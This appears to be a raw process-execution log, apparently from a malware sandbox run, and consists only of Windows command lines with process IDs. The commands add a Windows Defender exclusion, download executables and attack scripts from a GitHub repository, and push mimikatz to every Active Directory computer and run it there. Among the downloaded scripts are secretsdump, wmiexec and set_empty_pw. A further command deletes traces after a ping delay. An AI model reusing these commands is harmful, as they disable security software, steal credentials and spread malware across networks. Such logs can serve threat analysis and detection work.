cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
2140powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
2200cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Dpose.exe -Outfile C:\WinXRAR\Dpose.exe
2332powershell.exe powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Dpose.exe -Outfile C:\WinXRAR\Dpose.exe
2392cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Bootxr.exe -Outfile C:\WinXRAR\Bootxr.exe
2476powershell.exe powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Bootxr.exe -Outfile C:\WinXRAR\Bootxr.exe
2536cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\mimikatz.exe"
2700PING.EXE ping 1.1.1.1 -n 1 -w 3000
2880python.exe python --version
2720powershell.exe powershell -Command " $computers = Get-ADComputer -Filter * | Select-Object -ExpandProperty Name Invoke-Command -ComputerName $computers -ScriptBlock { cmd /c 'if not exist C:\WinXRAR mkdir C:\WinXRAR && powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/mimikatz.exe -Outfile C:\WinXRAR\mimikatz.exe && C:\WinXRAR\mimikatz.exe' } "
2732cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/wmiexec.py -Outfile C:\WinXRAR\wmiexec.py
2920powershell.exe powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/wmiexec.py -Outfile C:\WinXRAR\wmiexec.py
2084cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Mizedo.exe -Outfile C:\WinXRAR\Mizedo.exe
2120powershell.exe powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Mizedo.exe -Outfile C:\WinXRAR\Mizedo.exe
2404cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/set_empty_pw.py -Outfile C:\WinXRAR\set_empty_pw.py
2504powershell.exe powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/set_empty_pw.py -Outfile C:\WinXRAR\set_empty_pw.py
2656cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/secretsdump.py -Outfile C:\WinXRAR\secretsdump.py
2876powershell.exe powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/secretsdump.py -Outfile C:\WinXRAR\secretsdump.py
2988